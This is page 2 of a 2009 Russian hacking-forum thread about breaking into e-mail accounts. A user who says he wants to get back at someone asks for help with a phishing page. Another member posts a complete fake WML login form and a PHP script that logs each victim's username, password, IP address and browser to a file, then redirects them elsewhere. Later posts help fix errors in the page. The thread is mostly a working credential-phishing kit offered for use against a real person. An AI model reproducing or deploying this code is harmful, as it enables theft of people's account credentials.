HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи
Перезагрузить страницу Несколько способов взлома e-mail аккаунтов
   
Ответ
Страница 2 из 5 < 1 2 3 4 5 >
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 29.06.2009, 13:46
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию
Цитата:
Сообщение от Shark_d  
Здравствуйте, уважаемые!
Сразу оговорюсь, что я не хаккер, не кодер и пр. и вообще мало в этом разбираюсь. Но! достал меня один г....н и ничего не остается делать, как попытаться "успокоить" его. Но ближе к сути вопроса:
По способу №1 (фейковая страница авторизации). Насколько я понял, способ может сработать не только на мыле, а на любой страничке авторизации пользователя? Так вот, ткните носом, куда подставить адрес моего скрипта "log.php" в данном коде?
PHP код:
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE wml PUBLIC "-//WAPFORUM//DTD WML 1.2//EN" "http://www.wapforum.org/DTD/wml12.dtd">
<wml>
<head>
<meta http-equiv="Cache-Control" content="no-cache"/>
<meta http-equiv="Cache-Control" content="max-age=0"/>
<meta http-equiv="Cache-Control" content="must-revalidate"/>
<meta http-equiv="Expires" content="Tue, 01 Jan 1970 00:00:00 GMT"/>
</head><card id="main" title="Авторизация">
<p align="center">
Логин:<br/>
<input type="text" name="login9660" maxlength="16"/><br/>
Пароль:<br/>
<input type="password" name="pass9660" maxlength="30"/><br/>
Привязка к IP/браузер:<br/>
<select name="checkIB9660" ivalue="1"><option value="1">вкл.</option><option value="0">выкл</option></select><br/>
<anchor>войти<go href="/auth.php" method="post"><postfield name="login" value="$(login9660)"/><postfield name="pass" value="$(pass9660)"/><postfield name="checkIB" value="$(checkIB9660)"/><postfield name="url" value="/account.php?"/><postfield name="PHPSESSID" value="nmcd6rs62et5q84j0seocodi25"/></go></anchor><br/>
<a href="/?PHPSESSID=nmcd6rs62et5q84j0seocodi25">на главную</a>
</p>
</card>
</wml>
Заранее благодарен
там у тебя нет тега форм как все привыкли что в нем должен указыватся action,и нет сабмита а есть хреф ,вот написал тебе говтовый фэйк
PHP код:
<!DOCTYPE wml PUBLIC "-//WAPFORUM//DTD WML 1.2//EN" "http://www.wapforum.org/DTD/wml12.dtd">
<wml>
<head>
<meta http-equiv="Cache-Control" content="no-cache"/>
<meta http-equiv="Cache-Control" content="max-age=0"/>
<meta http-equiv="Cache-Control" content="must-revalidate"/>
<meta http-equiv="Expires" content="Tue, 01 Jan 1970 00:00:00 GMT"/>
</head><card id="main" title="Авторизация">
<FORM name=remove ACTION='log.php' METHOD='POST' ENCTYPE='application/x-
www-form-urlencoded'>
<p align="center">
Логин:<br/>
<input type="text" name="login9660" maxlength="16"/><br/>
Пароль:<br/>
<input type="password" name="pass9660" maxlength="30"/><br/>
Привязка к IP/браузер:<br/>
<select name="checkIB9660" ivalue="1"><option value="1">вкл.</option><option value="0">выкл</option></select><br/>
<a href="javascript:document.remove.submit()">войти</a><br></form>
<a href="index.php">на главную</a>
</p>
</card>
</wml

log.php
PHP код:
<?php
if($login9660 and $pass9660!==0){
$Browser getenv("HTTP_USER_AGENT");
$ip $_SERVER["REMOTE_ADDR"];
$Data date("d-m-y H:i:s"time());
$log"login:$login9660 |pass:$pass9660 |$Browser |$ip |$Data|||";
$filelog fopen("base.php","a+");
fwrite($filelog,"\n $log \n");
fclose($filelog);
}
header('Location: http://google.com');//перепишешь адрес
?>
логи пишутся в base.php
 
Ответить с цитированием

  #12  
Старый 29.06.2009, 14:43
HIVER
Познающий
Регистрация: 28.10.2008
Сообщений: 43
Провел на форуме:
117557

Репутация: 125
По умолчанию
Цитата:
Сообщение от L I G A  
Или вот попроще способ и даже можно сказать лучше,сам пользуюсь,потому как посетители часто оставляют сообщения с символами: ">,+,",:" ит.д. тогда предыдущий способ выдаст им "XSS" , на античате сообщения фильтруются таким же способом:
PHP код:
$text=htmlspecialchars($_GET['slovo']); 
функция htmlspecialchars()//преобразует специальные символы в HTML аналоги .
Товарищ, вы про full path disclosure никогда не слышали? Поиск по форуму где-то рядом.
 
Ответить с цитированием

  #13  
Старый 29.06.2009, 15:06
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию
сори метод проглядел там через пост.
 
Ответить с цитированием

  #14  
Старый 29.06.2009, 15:24
Shark_d
Новичок
Регистрация: 28.06.2009
Сообщений: 6
Провел на форуме:
8882

Репутация: 0
По умолчанию
L I G A, спасибо за помощь, буду пробовать. (з.ы. Репы добавить не могу почему-то, наверное молод еще)
Добавлено: блин чет не то в фейковой страничке:

Ошибка анализа XML: синтаксическая ошибка (Строка: 9, Символ: 11)
Ошибка:invalid attribute value
Спецификация:http://www.w3.org/TR/REC-xml/#NT-AttValue
Последний раз редактировалось Shark_d; 29.06.2009 в 15:39..
 
Ответить с цитированием

  #15  
Старый 29.06.2009, 15:51
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию
выложи весь код страницы.
 
Ответить с цитированием

  #16  
Старый 29.06.2009, 17:39
Chrome~
Постоянный
Регистрация: 13.12.2008
Сообщений: 354
Провел на форуме:
1747641

Репутация: 175
Отправить сообщение для Chrome~ с помощью ICQ
По умолчанию
Я точно не уверен, но разве нельзя строчку:
Код HTML:
<anchor>войти<go href="/auth.php" method="post">
заменить на:
Код HTML:
<anchor>войти<go href="/log.php" method="post">
 
Ответить с цитированием

  #17  
Старый 29.06.2009, 18:03
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию
"войти" не стоит между <a href="...">tyt</a> и ничего делать не будет,тем более передавать данные в log.php
 
Ответить с цитированием

  #18  
Старый 29.06.2009, 18:22
Chrome~
Постоянный
Регистрация: 13.12.2008
Сообщений: 354
Провел на форуме:
1747641

Репутация: 175
Отправить сообщение для Chrome~ с помощью ICQ
По умолчанию
Да, сорри, действительно ошибся. К тому же, если сохранить вариант от Shark_d в формате HTML, то ссылка "Войти" даже неактивна. Кстати, фейк от L I G A у меня работает, нету никаких ошибок.
 
Ответить с цитированием

  #19  
Старый 29.06.2009, 19:10
Shark_d
Новичок
Регистрация: 28.06.2009
Сообщений: 6
Провел на форуме:
8882

Репутация: 0
По умолчанию
Цитата:
Сообщение от L I G A  
выложи весь код страницы.
Дык я его весь и выложил, сам посмотри http://h2m.ru/auth.php
бесплатный хостинг сайтов.
А вобщем, не заморачивайся особо, не получится, значит не получится. Будем по другому "успокивать" тем более, я тут не совсем по теме пишу
 
Ответить с цитированием

  #20  
Старый 29.06.2009, 20:19
Chrome~
Постоянный
Регистрация: 13.12.2008
Сообщений: 354
Провел на форуме:
1747641

Репутация: 175
Отправить сообщение для Chrome~ с помощью ICQ
По умолчанию
Кажется, что данный бесплатный хостинг не поддерживает PHP
 
Ответить с цитированием
Ответ
Страница 2 из 5 < 1 2 3 4 5 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ